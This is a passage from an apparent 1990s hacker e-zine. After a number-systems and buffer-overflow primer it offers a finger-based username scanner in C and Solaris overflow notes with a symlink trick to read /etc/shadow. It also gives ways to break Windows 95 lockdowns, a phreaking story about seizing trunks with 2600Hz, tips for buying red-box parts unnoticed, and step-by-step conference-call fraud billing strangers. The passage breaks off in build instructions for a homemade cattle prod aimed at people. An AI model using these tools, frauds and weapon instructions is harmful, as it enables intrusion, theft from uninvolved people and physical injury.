come in handy when you can't remember a conversion or the number is really weird. As you may of guessed, or may not have, octal numbers use up 8 bits per number, because they are ultimately stored as zeros and ones. The number 7 in octal is just 7, but to store it it takes 8 bits, or 00000111. Counting Hexadecimal ----------------------- Hexadecimal, or HEX as it's better known, is base 16. Now as you gather from octal numbers, when you change bases you need a new set of numbers to count with. Base 16 has 16 numbers, like octal has 8 and binary has 2. They are:0,1,2,3,4,5,6,7,8,9,A,B,C,D,E,F. Why A-F instead of maybe something else? Well the letters A-F are well known and are in order, so for simplicity the makers of HEX used them. Like octal and binary we can use a column chart to count in HEX. 4096 256 16 1 16^3 | 16^2 | 16^1 | 16^0 ------------------------------------------- 0 = 0 1 = 1 2 = 2 3 = 3 4 = 4 5 = 5 6 = 6 7 = 7 8 = 8 9 = 9 A = 10 B = 11 C = 12 D = 13 E = 14 F = 15 1 0 = 16 1 1 = 17 1 E = 30 8 5 = 133 As you can see, HEX is a little more complicated and takes practice to get used to. Even when you can effectively understand the numbers, sometimes you still need a calculator or a program, like a HEX editor to read them because of their sizes and complexities. Quick Lesson on Conversions ------------------------------ I know that a natural question has to be if there is an easier way to convert between the bases, and luckily there is. I'll give a quick lesson, as it's pretty simple. binary numbers can be 1 bit, and octal numbers can be made up from 3 bits on binary. HEX, likewise, can be made from 4 bits of binary. It's easier to show: Lets say we have a number, 62, In binary it's: 0 1 1 1 1 1 0, and to convert to octal, we group it into 3 bit segments, from the right, and read it: 0 (1 1 1) (1 1 0). We can ignore the leading 0. So in octal we read it in binary, 1 1 1 = 7, and 1 1 0 = 6, so in octal it's 76. Let's use 62 again and find HEX. This time we group in 4s, from the right, like so: (0 1 1) (1 1 1 0), since the first term has only 3 terms we can add a leading 0, but it will not make any difference to the outcome. Read the groups, 0 1 1 = 3, and 1 1 1 0 = E, so in HEX it's 3E. 0 1 1 1 1 1 0 - Binary 0 ( 1 1 1 ) ( 1 1 0 ) - Octal ( 0 1 1 ) ( 1 1 1 0 ) - Hex If you're clever you can figure out how to convert from any of the 3 to any of the others with minimal effort. Signed Numbers ------------------ How do computers know if a number is positive or negative if all it sees is zeros and ones? Well for the purpose of this article I'll keep it simple and use binary, as octal and HEX can get very complex. Before we go any further I have to explain what complementary systems are as we are going to be using base complements to determine signs. A base complement is when you take the largest number in a numbering system and subtract from it. For example, say we are in normal everyday base 10, and we have the number 1267. If we want to find it's complement we would take the largest number in base 10s number system, a 9, and subtract each number from it. 9999 - 1267 ---------- 8732 So 8732 is the complement to 1267. Lets try binary. Since binary is base 2, then the largest number is 1. Say we have the number, 62 again, in binary, 0 1 1 1 1 1 0, let find it's compliment. 1111111 - 0111110 --------------- 1000001 = 37 So we see that 37, or 1 0 0 0 0 0 1, is the complement to 62, or 0 1 1 1 1 1 0. Using complements we can sign a number as negative or positive. How? Well all positive numbers will be in true form, like 62 will be 0 1 1 1 1 1 0, but if we had a negative 62, we would use it's complement, or 1 0 0 0 0 0 1. "Hold on" you say, "1 0 0 0 0 1 is 37!". Not anymore, as binary numbers use a signed bit, or the first bit to determine if a number is positive or negative. The first bit is used to tell this, if it's a 1 it's signed negative, if it's a 0 it's signed positive. So how do we get 37? Add a leading 0, 0 1 0 0 0 0 0 1; now that's 37 and 1 0 0 0 0 0 1 is a negative 62. Once the computer sees the leading bit is a 1, it knows it's dealing with a negative number. An easy way to remember how it works, if the first bit is a 1, that find out what is the column value for that bit, so in 62 the first bit would be a 64, or 2^6. Since the binary number 0 1 0 0 0 0 0 0 is 64, and 0 1 1 1 1 1 1 1 is 63, then if we us 1 0 0 0 0 0 1 as negative 62 we can think of the first slot as a negative number, or the first bit as the negative and everything else positive. Say the first bit is a negative 64 instead of a positive 64, then subtract 1 because we are in reverse, then subtract for each other 1, the number of that column, so in this example, we would subtract 1 more for the 1 in the first column giving us negative 62. It can get complicated, but it just takes a little practice. Why practice? Why care about all this crap? Beside the fact it will help you later on down the road for those of you planning on going to college to continue your schooling in computers, it's very helpful in hacking to know this to. The Buffer Overflow ------------------------ I'm going to make a very simple example of what a buffer overflow is and how it happens and what it has to do with all these numbers and number systems. Well for this articles purpose let use a very simplistic 4 bit number in binary. As some of you know modern buffer overflow attacks are in HEX, or as the exploit code calls it, Assembly, which is actually wrong. Ok, say we have a number, and we want to do some addition, the numbers 3 and 6 using 4 bits. 0 1 1 0 = 6 + 0 0 1 1 = 3 ------------ 1 0 0 1 = - 7 Hold on, 3 + 6 = -7? In 4 bits the computer thinks that this number is 9, but 4 bits can't hold the number 9, and it comes up with negative 7. Whammo! Buffer Overflow. Most computers from the 8086 and up have a flag that indicates if a buffer overflow has occured or not, but if the code has not been carefully designed, skillful coders can find and exploit codes that are vurnerable, and they do every day. Filling up buffers with numbers in HEX that a larger then a buffer was designed to handle, crashing programs, racing for root. Conclusions ---------------- I hope I've made clear how to understand binary, octal and HEX number systems; how to read them, how to manipulate them back and forth, and how they sign numbers so one may perform basic mathematical operations. I also hope, if you learned anything, is how important it is to understand these number systems and how they tie into hacking and your future down the road. I am a firm believer that if you learn the basics then the hard stuff will be easy.... Bronc Buster!!! Thanks to RLoxley, NeTJaMMr and Perhillion for helping proof this. [EOF] ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ Mail server username scanner - scan.c by memor /* Make a usernames lists from a file, to an host, via Fingers.. for any use.. example: scan userfile mail.server.to.scan.net or to save it in an outpout file : scan userfile mail.server.to.scan.net > result have fun with that little thing... memor/hbs - sjta */ #include #include #include void main(int argc,char *argv[]) { /* define file handle , strings */ FILE *nombre1; char *nom; char *commande; char *dnsip; int fin; int test; /* create stacks */ nom = (char *)malloc(30); commande = (char *)malloc(30); dnsip = (char *)malloc(50); fin=0; /* do we have enough arguments ? no ? */ if (argc<3) { printf("Scans for usernames with finger.. memor(hbs/sjta) \nusage : %s userfile host\n",argv[0]); /* ok bye.. not enough arguments */ exit(1); } /* we have enough.. we can now work :) */ if (argc>2) { nombre1=fopen(argv[1],"r"); /* can we open that file ? /* if(nombre1==NULL) { printf("Can't open the file!!\n"); /* no? ok bye.. :) */ exit(1); } /* saving some arguments and hiding the programm */ sprintf(dnsip,"%s",argv[2]); sprintf(argv[0],"joe "); sprintf(argv[1]," "); sprintf(argv[2]," "); /* while we reach the end of file :) */ while(fin!=1) { /* i catch the username and wait test for the end of file */ test=fscanf(nombre1,"%s",&nom[0]); if(test==EOF) fin=1; else { /* i attempt a finger to see if we got an existant username */ sprintf(commande,"finger %s@%s",nom,dnsip); printf("Scanning for [%s] ..\n%s\n",nom,commande); system(commande); } } /* closing input file of usernames */ fclose(nombre1); } } ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ Vuls in Solaris 2.5.1 by Shok Although there are vulnerabilities known in rlogin and chkey, these are unrelated to them. rlogin: They have the following code (which is pathetic might I add): char *p; char term[256]; [...] p=getenv("TERM"); [...] strcpy(term, p); Yah there is Sun's super security.......... sheesh the obvious fix would be a simple strncpy but NO they had to do it the secureless way ;) arp: Well this is the gethostbyname() vulnerability in solaris 2.5.0 and 2.5.1 Now as most people know, there was a vulnerability in gethostbyname, and it's sploit used rlogin. Well.....if they chmod -s'd rlogin (which would break it anyway), you could still use arp, as it is suid (although occasionally I set it sgid instead). This is a shortened version of the code: if (argc == 2) { get(argv[1]); exit(0); } get(host) char *host { [...] hp = gethostbyname(host); More great ol' Sun security eh? The sploit code for this is just a modified gethostbyname sploit. chkey: gee let's look at this one....... char program_name[256]; strcpy(program_name, argv[0]); WAHOO!!! THE BEST ONE YET! Once again great job sun...... Although I should make it clear I do like Sun.....but they are really ignorant assuming people won't get ahold of the source so they don't have to use proper bounds checking....I mean that should be like common sense. That's all I am going to mention.....although I will give a few.... I'm looking at cu and uucp which appear to have an overflow in there remote host and commands.......to test this you ought to just make a generic program: #include void main(int argc, char **arg) { unsigned long int i; unsigned long int num; num=atoi(argv[1]); for (;inl_name); and nl->nl_name is argv[1] if it is a macro I'm assuming. But this is expstr(): expstr(s) char *s; char buf[BUFSIZ]; [...] sprintf(buf, "%s%s%s", s, tp->n_name, tail); As described in expand.c.......it appears that you can manipulate enviromental variables like SHELL, TERM, etc.....and ~user is also a macro..you get the idea shchars = "${[*?"..... E_VARS for expanding variables....... E_SHELL... E_TILDE......so if you did rdist $SOMEVAR it will recognize the '$' and expand that variable.......I haven't been able to test this as the BUFSIZ is too big and I get disconnected if I export a variable greater than 1000 or so (weird heh...) This is also related to the message I posted to bugtraq on multiple overflows in MH-6.8.3. In ruserpass.c, in the function rnetrc().....they have the following (which has two vuls): char *hdir, buf[BUFSIZ]; hdir=getenv("HOME"); [...] sprintf(buf, "%s/.netrc", hdir); Now there are two problems with this..... First of all the obvious....is there is an overflow. Secondly, all one would have to do is for example ln -s /etc/shadow $HOME/.netrc and you could abuse that. Libc specifically says you shouldn't do this. In libcurses, in pr_headers, in print.c there is an overflow in the char *terminfo; char buf[512]; terminfo=getenv("TERMINFO") [...] sprintf(buf, "%s%s%s", terminfo..... So anything that uses libcurses (such as screen), is vulnerable. Anyway it's late, I'm tired. So that's about all for now. Enjoy, --==+*~(Shok)~*+==-- shok@sekurity.org HOME PAGE: http://www.janova.org FTP SITE: ftp://ftp.janova.org ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ Operating Systems by Fucking Hostile There are a lot of Operating Systems out there. It seems that the two major ones are Windows and Linux. Among the average computer user you will find that most of them use Windows 95 or NT. In the computer underground now it seems the trend is Linux and its varients. Anyways this article will not be about either of those, actually it will have some info on them but that's not all. I am writing this with intention to give readers the knowledge of all available OS's there are out there. Information on the OS, where to find out more about it, and where to get it. Hopefully people will learn about all the options they have beyond the trend that is going on out there. This gives only a little detail on the OS but at least gives you some ideas to look at. - AROS - About: The Amiga Replacement OS. Idea started around 1993 when Amiga was at a low point. AROS fully started in the winter of 1995. The goal of AROS is to be as compatible as possible to AmigaOS 3.1, ported to different types of CPU's, Binary compatible on Amiga and source compatible on other hardware, and can run as a standalone version which boots directly from harddisk, as an emulation which opens a window on an existing OS to develop software and run Amiga and native applications at the same time and as a link library which allows to create native applications with the comfort of the AmigaOS. Current Version: Unknown Homepage: http://aros.fh-konstanz.de/aros/ - BeOS - About: In 1990 former former president of Apple's product division, Jean-Louis Gassée, formed Be. INC. The Be Operating System is a new software system designed for the media and communications-based applications of the next decade. While retaining compatibility with data and network standards in use today, the BeOS jettisons many of the assumptions inherent in older OS architectures to achieve a new level of performance and a significantly simplified programming model. The BeOS features: A True Multitasking, Heavily Multi-threaded System, Symmetric Multiprocessing, An Object-Oriented Design, A Design for Real-Time Media and Communications, and Simplicity. Current Version: Unknown Homepage: http://www.be.com - CHORUS/OS - About: The CHORUS/OS family of operating system products has been designed for telecommunications and other real-time embedded systems manufacturers. CHORUS/OS offers a binary family of highly configurable, richly featured, componentized operating system products. When CHORUS operating systems are integrated with CHORUS/COOL ORB, Chorus' distributed real-time embedded object request broker, real-time systems and devices have access and are accessible to any computer, or server in the enterprise, providing management systems in the enterprise with access to data from the embedded world, and giving the embedded world access to application software available from management systems. Current Version: Unknown Homepage: http://www.chorus.com - FreeBSD - About: FreeBSD is an advanced BSD UNIX operating system for "PC-compatible" computers, developed and maintained by a large team of individuals. FreeBSD offers many features today which are still missing in other operating systems, even some of the best commercial ones. Advanced features for performance, security, and even binary compatibility with other popular operating systems. And it's free. Current Version: 2.2.2 Homepage: http://www.freebsd.org - NetBSD - About: The NetBSD Project is the collective volunteer effort of a large group of people, to produce a freely available and redistributable UNIX-like operating system, NetBSD. NetBSD is based on a variety of free software, including 4.4BSD Lite from the University of California, Berkeley. It runs on a large number of hardware platforms and is highly portable. It comes with complete source code, and is user-supported. Current Version: 1.2 Homepage: http://www.netbsd.org - OpenBSD - About: The OpenBSD project was spawned from NetBSD (ie. a member of the 4.4BSD family) and is developed separately. OpenBSD tracks bug reports and source tree changes from the NetBSD and FreeBSD projects fairly closely. Even pieces of code from the Linux projects have been used. OpenBSD has too much shit about it to even list so just check out the homepage. Current Version: 2.1 Homepage: http://www.openbsd.org - GEOS - About: Geoworks designed the GEOS® operating system to enable devices that are graphical, easy-to-use, affordable, feature-rich, and able to support advanced communications. Geoworks believes there are several primary characteristics necessary for system software in these new devices. The operating system must be flexible so that device manufacturers can customize their products for specific markets. The software must deliver high performance without sacrificing efficiency. And users of these devices must be able to connect to standard data sources, including the desktop, corporate network, and Internet services. Current Version: Uknown Homepage: http://www.geoworks.com/htmpages/sso.htm - Inferno - About: Inferno was developed by the scientists at Bell Labs, Lucent Technologies' research and development arm. The Computer Science Research Center of Bell Labs created Inferno - this same Center developed UNIX, C and C++ programming languages and workstation technologies. Inferno is a Network Operating System that delivers interactive services through a variety of networks, providing ubiquitous access to resources and information. Current Version: 1.1 Homepage: http://207.121.184.224/info.html - TurboLinux - About: TurboLinux 1.0, a new Linux distribution fully compatible with RedHat Linux, some features include Easy Installation and Setup - Hardware components (SCSI, Ethernet, and Video adapters) are automatically detected at installation. TurboDesk - This configurable desktop environment allows customization without editing text files. AutoUpdate - Packages are seamlessly installed onto your system using either the interactive mode or the fully automatic mode. Current Version: 1.0 Homepage: http://www.turbolinux.com - Other Linux OS's - TurboLinux is one of the newer ones so that is why I mentioned it.. there are a lot more tho that can be found at: http://www.linux.org/dist/index.html - Microsoft Windows - Windows 3.1 - Windows 95, Windows 97, Windows CE, and Windows NT You all know about Windows. If not go to: http://www.microsoft.com - MINIX - About: MINIX is a free UNIX clone that is available with all the source code. Due to its small size, microkernel-based design, and ample documentation, it is well suited to people who want to run a UNIX-like system on their personal computer and learn about how such systems work inside. It is quite feasible for a person unfamiliar with operating system internals to understand nearly the entire system with a few months of use and study. Current Version: 2.0 Homepage: http://www.cs.vu.nl/~ast/minix.html - OS/2 - About: IBM's OS. Kind of like Windows except they have less software made for them. If it wasn't for that it might not be too bad. Current Version: Unknown Homepage: http://www.software.ibm.com/os/warp/ - Plan9 - About: Plan 9 is a distributed computing environment assembled from separate machines acting as terminals, CPU servers, and file servers. A user works at a terminal, running a window system on a bitmapped display. Some windows are connected to CPU servers; the intent is that heavy computing should be done in those windows but it is also possible to compute on the terminal. A separate file server provides file storage for terminals and CPU servers alike. Current Version: Unknown Homepage: http://www.ecf.toronto.edu/plan9/ - Xinu - About: Xinu is a small, elegant, multitasking Operating System supporting the following features: Concurrent Processing, Message Passing, Ports, Semaphores, Memory Management, Buffer Pools, Uniform Device I/O, Shell, Tcl, and TCP/IP. Current Version: Xinu 7.9 Homepage: http://willow.canberra.edu.au/~chrisc/xinu.html - QNX - About: Started off being called 'Quick Unix', the QNX realtime OS offers you all the advantages of a true microkernel. It's small, scalable, extensible, and fast. As a true microkernel OS, QNX starts with a lean core of highly reliable code. It's small enough for ROMable embedded applications, yet powerful enough to run a distributed network of several hundreds of processors. Current Version: Unknown Homepage: http//www.qnx.com - Solaris - About: Sun Unix-based user environment, including the Unix operating system and an X11-based window system. Solaris 1.x is a retroactive (marketing?) name for SunOS4.1.x, a BSD-like version of Unix with some SVR4 features. Solaris 2.x (which is what most people mean by "Solaris") includes SunOS5.x, which is an SVR4-derived Unix. Current Version: 2.6 Homepage: http://www.sun.com/solaris/index.html ------ Well that is all I have. There are a lot of others out there and a lot more information on them then I have supplied but hopefully this will give some people stuff to check out. Also check out http://www.myos.com and http://www.ugu.com for more info on different OS's. ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ Hacking your way to DOS by Devix Well, I thought I should write an article for thtj this month so here it is... Newbies Guide: Hacking your way to DOS. Unfortunatly your access to DOS may be restricted so you can't play your games or hack the LAN. This article will attempt to describe many various ways to break out of that annoying GUI called windows95 and bring you back to DOS. There are many ways to protect you from getting to DOS such as using policy editor (most common. this can be found on your windows95 cd) or some other 3rd party software package. Some of these ways may not work so if one doesn't, just try the next. 1. The old F8 on boot-up. This one is self explanatory. When you see the "Starting Windows 95..." quickly press the F8 button and it may bring up a menu that looks like this: Microsoft Windows 95 Startup Menu ================================== 1. Normal 2. Logged (\BOOTLOG.TXT) 3. Safe mode 4. Safe mode with network support 5. Step-by-step confirmation 6. Command prompt only 7. Safe mode command prompt only 8. Previous version of MS-DOS Enter a choice: 1 You should choose #6. If everything goes right, you will soon see a "C:\". If the menu doesn't show up when you press F8, the administrator (or computer teacher) may have disabled this. To re- enable it, just fire up notepad and edit "c:\msdos.sys". This file is normally a system/hidden/readonly file. The part you want to edit is the line that says "BootMulti=0". Change it to "BootMulti=1". 2. Using OLE. Just start up any program thats supports object embedding such as wordpad and choose "Object..." from the "Insert" menu. A fancy little box should pop up. Click on "Create from File" and put this as the file name: "c:\command.com". Click OK and you should now see an icon stuck in your wordpad document. Double-Click the icon and a dos prompt should appear. 3. Creating a shortcut in the desktop/start menu. Start any 32-bit program that lets you open/save files. Click on "Open..." (or "Save As...") from the "File" menu and change to the directory "c:\windows\desktop" or "c:\windows\start menu". Right-click in the main box and choose "New -> Shortcut" from the menu that pops up. Create a shortcut to "c:\command.com" and then look on the desktop/start menu for the icon. Use it. 4. Command.com from "File Find". Click once on a blank part of the taskbar. Press F3. Search for "command.com" from drive "c:". To speed this up, unselect "Include subfolders". Click "Find" and when command.com shows up in the results area, double-click it. 5. Editing ".lnk" files. Just edit one of the "c:\windows\desktop\*.lnk" files with a program that will let you edit the actual lnk file, not the file it links to. most 16-bit editors should work. Just change it like you would with a hex-editor so that it links to "c:\command.com" instead. 6. Changing shells. Just edit "c:\windows\system.ini" so the line that says "shell=Explorer.exe" will say "shell=c:\command.com". Restart the computer and you will now have a dos prompt. From dos, type "explorer" to get the rest of windows loaded. Change system.ini back when you need everything to work how it was. 7. "Open with...". Start some 32-bit program. Choose "Open..." from the "File" menu and right-click a file while pressing shift. Choose "Open with..." and proceed to open the file with "c:\command.com". 8. Word 6+ Macros. Start up Microsoft Word and make a macro that says: shell "c:\command.com" Run it. 9. Visual Basic. Startup Vb, make a command button on the form, and give it the code: x = Shell("c:\command.com") Press F5 and then click the button that you just made. Voila! 10. Resetting the screen. Shut down the system so that it shows that stupid screen "It is now safe to shut off your computer." That screen is really just a bmp file being displayed over a dos prompt. Type the following just like you were in dos: cls mode co80 This will attempt to reset the screen and show you a "C:\" if it is applied at the right time. 11. Netscape Apps. Choose "General Preferences" from the Options menu in netscape and then click on the tab labeled "Apps". Type in: c:\command.com for your telnet application and then click OK. Next, surf on over to "telnet://". This should launch a dos prompt. 12. System Information. Start up Microsoft Word and goto "About" from the help menu. Click the "System Information" button and then the "Run" button. Well thats about all I can think of. I know that there is many more ways to get to dos but I am too busy to find them... Seeya! Devix - devix@thepentagon.com www.thepentagon.com/devix PGP key available above. Use it. ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ A phreak's dream come true Written for thtj from the personal accounts of Kode9 Saturday, September 13, 1997: Kansas City, Missouri The local Southwestern Bell telephone office gets its basement flooded. Waking to the sound of a telephone ringing can be a pleasing experience, or it can be an irritating one; it guess it depends on how much you like phones. On this particular Saturday, I woke to that very sound, a ringing, but it was like no ring I'd heard before. It was a bunch of truncated rings, back to back, like ri..ri..ri.. instead or ring.....ring.....ring. I didn't know what it was, I didn't pick up the phone either. Thinking it'd go away, I just waited on it. But it kept making that short ring, over and over again. It lasted for about ten minutes, and then as quickly as it'd started, it stopped. I picked up the phone; no dialtone. It was silent, but it wasn't dead... the keypad lit up. There must be current, I thought. So the lines were alive, but there was no dialtone. The switch must've died. Do switches die? This one wasn't working. Was I the only one? I couldn't call anyone to find out, I'd have to drive around and see what was going on. The mall was alot more interesting than normal today, because apparently the payphones weren't returning quarters. Don't people listen for a dialtone before sticking in their money? I've never seen so many people so pissed at a payphone in my life, it was almost like a riot. I checked for a dialtone on one of them, though I was fairly certain there wouldn't be one, and I was right. Dead silence. How could this fast food eating, instant coffee drinking, all the day's news in a half hour watching society survive without phone service? Cellular, of course. The phone of the future, or at least, that's what the cellphone companies want us to think. Cell activity today was at an all time high, based on all the calls I picked up on my scanner. Most of them were people saying "oh gosh, my phone is dead!" but I did catch DOW chemical ordering some nitroglycerin. Stronger plastics through the use of explosive compounds? I guess it's possible. I'm certain that even though 911 has a cellular system, alot of people died as a result of the lack of landline service. Over the course of several hours of waiting for my precious phoneline to whisper a dialtone softly in my ear, I learned via the local news that the phone outage was caused by a water main break that flooded the basement of a SouthWestern Bell building, which just so happened to service the exchange I was in, along with exchanges in half the city. The water had apparently shorted out the ESS, and down came the system as a result. It's a wonder this hasn't happened before, SWBell being genius enough to house their ESS in the basement. If you haven't wondered already, as to why this story is being called 'a phreak's dream come true', you're not too bright. For those of you who are wondering, the title is soon to be explained to you. The phone company, in its infinite wisdom, decided that rather than continuing to leave the majority of a large city deaf and mute, they would do the best they could to bring service back to us. That revelation occurred at around nine in the evening, a good twelve hours after the trouble began, (so they're a little slow, we can't blame them, can we?) when I got a call from my girlfriend. Since the lines were up, I figured now was as good as any time to see exactly what kind of switching system they'd fired up, just hoping it wasn't ESS. I quickly dialed up my self appointed 800 testline, 18004GAYASS, and whipped out my 2600hz tone, proudly stored on my self-built recorder. I played it into my newly awakened line. Beep. Click. Line available. I didn't send any KP or ST tones, because I wasn't crazy, and I was well convinced that we weren't on ESS. Was it xbar? SxS? I don't know, and I was too excited to find out. What to do? I did what any noble phreak would do. I called every phreak I knew of in the Kansas City area. It was a virtual free for all. Anyone could seize a trunk. Anyone could abuse anything on this ever-so-temporary switching system that the phone companies were trying to make extinct. It was like a dream, like a wonderful phone phreaking dream. The gestapo never stopped by. They probably never knew I'd blown that tone, because they'd gone back to a system that was apathetic to my nefarious activities. The playing field had been leveled. The telco vs. the phreaks. It was amazing. Just thinking about the possibilities made me smile. I could call London, I could call anywhere; it'd be free. All those far off bbses I'd never dared to call, for fear of oppressive phonebills... I could call them with reckless abandon. Though a joyous event, opportunity didn't last long. It seems like nothing good ever does. They had ESS back up and running within two hours, but those precious hours, they were a phreak's dream come true. Later that night while watching the local news for a followup, things seemed to be well concluded with the quote of a certain local anchor... "Malicious tampering deterred the repair crews as they attempted to reinstate phone service in the area. The tampering was believed to be caused by several youths with some electrical skill." If not the thrill of hearing a trunk seized, watching footage of the switching equipment under four feet of water was the highlight of a memorable day. To all of you phreaks living in the Kansas City area under the (816) 350, 373, 478, 503, and 795-XXXX exchanges, I hope you thoroughly enjoyed this once in a lifetime opportunity. ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ Rat Shak Shopping Made Easy by N-TREEG Okay I know some of you guys have had a hard time getting the parts you need out of your local Rat Shak for whatever your purposes are. This article is to make your shopping experience a little more pleasurable and / or successful. Note: "Rat Shak" is henceforth used to avoid all the evil legalities. "QUESTIONABLE" PARTS Okay here's a little tid-bit for you. The employees can't sell you anything they feel you are going to use for less-than-legal purposes. You'll cut out a lot of your parts-finding frustration if you don't elude to it's uses, whatever those might be ;-) Just don't bring up the parts' purposes what-so-ever. TIP #1: Do not go into Rat Shak with a list if it can be avoided. If you must have a list here are a few things to keep in mind: Try to keep it as short as possible. Only have on there a part number or something if you know specifically what it is you want. The more vague it is, the less the salesman can conclude from it. It's also a little less suspicious if your list is hand-written. NEVER EVER EVER go into Rat Shak with printed box plans in hand. That's getting you nowhere fast! It's always best if you've got memorized the specific part you need. TIP #2: Never mention what the parts are going to be used for. Don't bring it up. If the salesman asks, have some feasible alternative ready to give that the part could be used for (plan ahead). You can always say you're replacing the exact same part in a broken toy/gizmo/home project/ appliance, etc. Words to avoid mentioning: red box, descrambler, cable box, linears, e-prom burners (I doubt they carry 'em), scanner mods, snarfers. YOUR PURCHASE TIP #3: Use common sense. Use your head. Don't ask for two things that are obviously questionable in the same sale. How much sense does it make to ask for a tone dialer then turn right around and inquire about crystals. THINK! TIP #4: The Name and Address bit. Don't be alarmed when Rat Shak salesmen ask for your infos. They are supposed to. No, it's not so they can track your purchases, etc. It's only for their sales flyer. So don't worry about it. Don't give 'em a hard time and you'll appear a little less suspicious. Plus you can sometimes find coupons for free stuff in the flyers they send you. Who couldn't use free batteries every once in a while? "WE DON'T HAVE ANY" TIP #5: Make use of the catalog. So, you can't find what you're looking for on Rat Shak's shelves. No biggie. Don't automatically assume they just don't want to sell you what it is you need. Ask to see their yearly catalog. They are usually up on the counter. Just thumb through them. (Or buy one, great to get parts numbers = no list!) They've got an index in the back to speed your search. If it's not there then it more than likely isn't regularly carried in stock. You've got another option. Ask if you could thumb through their warehouse's catalog. It's a bookstand that has about 8 or so ring binders beneath it. Flip one of those open and search their. If you can find what you need in there, have them order it for you. OTHER STUFF TIP #6: Don't try to "card" Rat Shak. Trying to card Rat Shak is a nice way to get busted. Just don't do it. They do verify credit cards, same thing for checks. They check signatures and ID too. Save yourself and them a hassel, pay for your merchandaise. Rat Shak's just a regular store with regular people for employees. They don't want to give you a hassel. Just exercising common sense will make your shopping experience more pleasurable for the both of you. They'll be happy becuase they'll be making money, you'll be happy becuase you'll be getting your part. Remember if you can't get it at Rat Shak, there are other stores out there: DigiKey - http://www.digikey.com Mouser Electronics - http://www.mouser.com Have fun kids...play nicely. N-TREEG HaX0r3d PerceptionS Productions / THTJ Shouts out to: The THTJ Crew, #phreak, #hackphreak, PADmaster, Speed1, Shoc, & The Spanish Mafia. ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ Telephone Conferencing by DataThief Well, i've recieved quite a few questions about setting up conferences so i went on a search to find an article to suggest to the people that kept asking me how, but i couldn't find one, so here it is... Setting up a conference can be a useful and phun skill to have, and it is alot easier than it would seem. There are a couple main teleconf. services including: AT&T Teleconferencing 800.232.1234 GTE Teleconferencing 800.483.9999 Alliance Teleconferencing varies (in large cities) i usually use AT&T because they rarely validate u'r info and are extremely gullible... ok, here are the steps u take to setup a conf: 1) lookup a name in the phone book, write down the name and # 2) goto u'r fav. fonebooth and dial a conference # listed above 3) give them the info on the paper for the person to be the 'host' (the person that gets charged for the call) 4) give them the payfone # as u'r number so they can call back 5) tell 'em what time u want it for and how long 6) choose dial-in or dial-out, if dial-in, choose how many ports (people) to add to the conf. 7) make up some company name incase they ask u for one 8) hang-up and they'll call back in 1-5min 9) they'll either say "sorry charges not accepted" or "ok u'r conf. will be up when u specified, thank you for using blah..blah..blah A typical conversation will go like this: Welcome to AT&T Teleconferencing Systems may i help you? yes, i'd like to setup a conference. who will be the host? host? the person paying the bill for the conference call oh, phone # of the host your name your phone #? duration of the call 2hours when will the call begin? 7:00CST is this gunna be a dial-in or dial-out conf? dial-in how many ports? 10 okay, we're gunna hang up while i set it up and i'll give u a call in a few min...okay? ok ...hang up... ...ring... hello hello this is at&t teleconf. is this Mr. yes okay your conf will be ready at your dial-in # is 800.xxx.xxxx your host code is xxxxxx your guest code is xxxxxx thanks Things that can go wrong: 1) u called to set it up from home and the feds show up 2morrow 2) noone gets on within 15 min of the designated start time and it auto-cancels the conf 3) they don't accept the charges one last thing about dial-in vs. dial-out in dial-in, u get the codes, and anyone can dial-into the conf, but u can't dial out to connect anyone. in dial-out, only the host can add people, so u have to be at a payfone, but its fun for pranks and stuff ;) ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ How To Make A Cattleprod by The Messiah Contents: * Introduction * Ingredients * How To Get The Ingredients * First Of All... * Part 1 - Making The Baton * Part 2 - Making The Power Pack * Part 3 - Packaging And Use * Words Of Wisdom Introduction: Have you ever wanted to shock the fuck out of an enemy? Ever wanted to clear up the congestion in the halls of your local high school? Ever wanted a hand buzzer similar to the one the Joker had in Batman? Well, this article is for you. With a wee bit of cash and some ingenuity, you too can be armed with a ~100-200 milliamperes shock rod. Ingredients: * One (1) automobile coil * One (1) 12v lantern battery *** NOT A CAR BATTERY!!!! *** * Some red wire * Some black wire * A little bit of green wire (not really necessary) * One push-button switch (non-toggling) * Two (2) feet of PVC pipe * One (1) PVC cap * Wire cutters, hacksaw, wire strippers, electrical tape * The IQ God gave the average Republican (20) * A 